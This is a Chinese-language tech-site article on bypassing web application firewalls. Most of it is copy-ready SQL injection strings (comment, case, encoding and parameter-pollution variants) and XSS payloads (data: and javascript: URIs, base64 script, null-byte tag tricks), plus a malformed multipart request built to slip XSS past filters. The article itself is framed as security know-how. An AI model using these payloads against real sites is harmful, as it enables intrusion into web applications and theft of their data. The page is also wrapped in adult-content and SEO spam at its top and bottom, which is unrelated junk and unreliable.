成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

淺談WAF繞過

安全 應用安全
因工作原因研究了幾天WAF繞過,簡單分享下WAF繞過思路。 對一些攻擊特征串進行不同的編碼,如:URL編碼,ASCII,Unicode.使用一些非標準的編碼很容易就造成WAF BYPASS.

因工作原因研究了幾天WAF繞過,簡單分享下WAF繞過思路。

對一些攻擊特征串進行不同的編碼,如:URL編碼,ASCII,Unicode.使用一些非標準的編碼很容易就造成WAF BYPASS.

一些字符非標準的unicode碼:

用NULL對數(shù)據(jù)截斷,經(jīng)測試發(fā)現(xiàn),靈活使用NULL字節(jié)可以有效避開配置為阻止包含已知攻擊字符串的請求的WAF。

有時,把使用GET方法的攻擊轉換成使用POST方法的攻擊可能會避開某些過濾。許多應用程序在整個應用程序中執(zhí)行某正常規(guī)過濾,阻止已知的攻擊字符串。如果一個應用程序希望收到使用GET方法的請求,它能之對URL查詢字符串執(zhí)行這種過濾。將請求轉換為使用POST就可以完全避開這種過濾。

看一個在沒有正確解析HTTP Request數(shù)據(jù)包導致的WAF繞過,觸發(fā)一個XSS:

POST /demo.php HTTP/1.0

Content-Type: multipart/form-data; boundary=0000

Content-Length: 97

–0000–

Content-Disposition: form-data; name=x’;filename=”‘;name=payload;”

<script>alert(1)</script>

–0000–

正常的HTTP應該是如下:

POST /demo.php HTTP/1.0

Content-Type: multipart/form-data; boundary=0000

Content-Length: 97

–0000–

Content-Disposition: form-data; name=”upfile”; filename=”payload”

<script>alert(1)</script>

–0000–

對比上面?zhèn)z個HTTP頭,給我們提供了WAF繞過的思路,修改攻擊特征串或HTTP中的一細節(jié),讓WAF無法解析或者解析錯誤導致繞過。(許多WAF對無法解析的HTTP頭,默認直接BYPASS)

羅列了一小部分的基本的繞過技巧(許多技巧因與工作相關無法分享,望見諒~^_^)。

這些技巧不一定能成功繞過WAF,但在許多場合下,通過一些基本技巧組合的使用,能提高繞過WAF的成功率,甚至完全BYPASS。

Sql Injection Bypass

大小寫變種:

UnIon/**/sElEcT/**/1,2,3/**/fRoM/**/Users–

使用注釋:

如上。在MySql中使用類似如下攻擊依然有效:

‘/**/UN/**/ION/**/SEL/**/ECT/**/1,2,3/**/FROM/table–

內聯(lián)內容(MySql Only):

/*!UnIoN*/SeLecT+1,2,3–

/*!UnIoN*/+/*!SeLecT*/+1,2,concat(/*!table_name*/)+FrOm/*!information_schema*/.tables/*!WhErE*/+/*!TaBlE_sChEMa*/+like+database()–

嵌套表達式:

UNunionION+SEselectLECT+1,2,3–

編碼:

2次URL編碼:

%252f%252a*/union%252f%252a*/select%252f%252a*/1,2,3%252f%252a*/from%252f%252a*/users–

ASCII:

“SELECT” ASCII Encode in databases.

MySql: char(83,69,76,69,67,84)

Oracle: chr(83)||chr(69)||chr(76)||chr(69)||chr(67)||chr(84)

Ms-Sql: char(chr(83)+chr(69)+chr(76)+chr(69)+chr(67)+chr(84))

使用空字節(jié):

%00′ union+select+1,2,3–

uni%0bon+se%0blect+1,2,3–

參數(shù)污染(ASP/ASP.NET):

id=1/**/union/*&id=*/select/*&id=*/pwd/*&id=*/from/*&id=*/users

XSS Bypass:

腳本標簽:

<object data=”data:text/html,<script>alert(1)</script>”>

<object data=”data:text/html;base64,Jmx0O3NjcmlwdCZndDthbGVydCgxKSZsdDsvc2NyaXB0Jmd0Ow==”>

<a href=”data:text/html;base64,Jmx0O3NjcmlwdCZndDthbGVydCgxKSZsdDsvc2NyaXB0Jmd0Ow==”>xss</a>

腳本偽協(xié)議:

<object data=javascript:alert(1)>

<iframe src=javascritpt:alert(1)>

<embed src=javascript:alert(1)>

標簽名稱:

<iMg onerror=alert(1) scr=a>

<[%00]img onerror=alert(1) scr=a>

<i[%00]mg onerror=alert(1) scr=a>

對標簽名陳稍做修改,可以避開僅僅阻止特定標簽名陳的過濾:

<x onclick=alert(1) src=a>xss</x>

責任編輯:藍雨淚 來源: 博客
相關推薦

2011-09-06 16:56:43

2013-06-03 10:02:53

WAF繞過

2019-02-19 08:45:41

2013-01-11 16:23:29

2013-05-13 11:25:02

WAFWeb應用防火墻WAF繞過

2020-07-31 11:02:09

網(wǎng)絡攻擊WAF黑客

2013-12-18 09:39:37

XSSWAF繞過

2015-06-16 13:37:03

2017-03-03 09:10:09

2022-08-03 12:28:58

云WAF網(wǎng)絡攻擊Web應用防火墻

2017-12-14 21:45:39

2013-04-19 13:20:14

2023-10-24 15:43:07

2018-06-13 07:06:05

2011-03-14 16:51:24

2012-11-23 16:30:16

2022-08-03 12:01:33

WAF漏洞網(wǎng)絡攻擊

2011-03-31 14:44:50

2011-03-15 10:29:55

2011-03-14 16:46:18

點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 国产精品福利网站 | 亚洲五码在线 | 国产99久久精品一区二区永久免费 | 精品一区二区三区在线播放 | 亚洲一区在线播放 | av黄色网| 九色av| 国产在线拍偷自揄拍视频 | 精品免费视频 | 欧美成人a∨高清免费观看 老司机午夜性大片 | 免费黄色的网站 | www.日韩系列 | 成人免费视频一区 | 一区二区三区四区视频 | 日韩中文字幕一区二区 | 精品一区二区观看 | 成人h视频 | 91在线视频网址 | 91欧美激情一区二区三区成人 | 精品一二 | 亚洲 欧美 日韩在线 | 欧美aⅴ | 国产高清视频在线观看播放 | 久久国产精品免费一区二区三区 | 91pron在线 | 久久久久久久久久久国产 | 欧美激情精品久久久久久免费 | 成人h视频在线观看 | 91看片官网 | 午夜播放器在线观看 | 日本久久精品视频 | 欧美13videosex性极品 | 天天视频成人 | 欧美一区二区激情三区 | 成人一区二区电影 | 亚洲精品在线免费观看视频 | 九九免费在线视频 | 日本欧美黄色片 | 91欧美激情一区二区三区成人 | 播放一级黄色片 | 久久天天躁狠狠躁夜夜躁2014 |